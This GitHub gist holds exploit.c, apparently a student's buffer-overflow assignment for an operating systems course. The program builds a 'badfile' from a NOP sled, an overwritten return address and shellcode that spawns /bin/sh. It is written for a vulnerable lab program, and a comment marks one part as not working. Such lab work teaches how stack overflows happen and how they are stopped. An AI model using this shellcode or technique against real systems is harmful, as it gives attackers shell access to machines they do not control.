-
-
Save binary132/5133557 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* exploit.c */ | |
| /* A program that creates a file containing code for launching shell*/ | |
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| char shellcode[]= | |
| "\x31\xc0" /* xorl %eax,%eax */ | |
| "\x50" /* pushl %eax */ | |
| "\x68""//sh" /* pushl $0x68732f2f */ | |
| "\x68""/bin" /* pushl $0x6e69622f */ | |
| "\x89\xe3" /* movl %esp,%ebx */ | |
| "\x50" /* pushl %eax */ | |
| "\x53" /* pushl %ebx */ | |
| "\x89\xe1" /* movl %esp,%ecx */ | |
| "\x99" /* cdql */ | |
| "\xb0\x0b" /* movb $0x0b,%al */ | |
| "\xcd\x80" /* int $0x80 */ | |
| ; | |
| void main(int argc, char **argv) | |
| { | |
| char buffer[517]; | |
| FILE *badfile; | |
| /* Initialize buffer with 0x90 (NOP instruction) */ | |
| memset(&buffer, 0x90, 517); | |
| /* You need to fill the buffer with appropriate contents here */ | |
| char mycode[20] = | |
| /* first line: valid size of buf (12 bytes) */ | |
| "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" | |
| /* second line: skip past sfp (1 word) */ | |
| "\xff\xff\xff\xff" | |
| /* third line: overwrite ret with beginning of shellcode */ | |
| /* note: stack for bof() begins at ~0xbffff2f8 +/- 0x10?*/ | |
| /* so buf starts at that minus 12(??? byte alignment) which is bffff2ec */ | |
| /* first 20 bytes are stack smasher ---> bffff300 */ | |
| /* then lots of NOPs */ | |
| /* put script at end so it falls through */ | |
| /* we'll jump somewhere shortly after our smasher -- */ | |
| /* try 0xbffff340 */ | |
| "\x40\xf3\xff\xbf"; /* this will be replaced */ | |
| /* note: write in little-endian */ | |
| /* (long*)(mycode+16)=0xbffff230; replace it here -- currently not working */ | |
| /* now put this at the beginning of badfile. */ | |
| int i; | |
| for( i = 0; i < 20; i++ ) | |
| { | |
| buffer[i]=mycode[i]; | |
| } | |
| /* this will now go at the end of the buffer */ | |
| /* note word alignment floor truncation */ | |
| int startpoint = ((516-strlen(shellcode)-20)/4)*4; | |
| int endpoint = startpoint+strlen(shellcode); | |
| int j = 0; | |
| for( i=startpoint,j; i < endpoint; i++,j++ ) | |
| { | |
| buffer[i]=shellcode[j]; | |
| } | |
| /* Save the contents to the file "badfile" */ | |
| badfile = fopen("./badfile", "w"); | |
| fwrite(buffer, 517, 1, badfile); | |
| fclose(badfile); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Note: this was for an OS assignment demonstrating buffer overflow vulnerability of certain executables, and ways to counteract those vulnerabilities.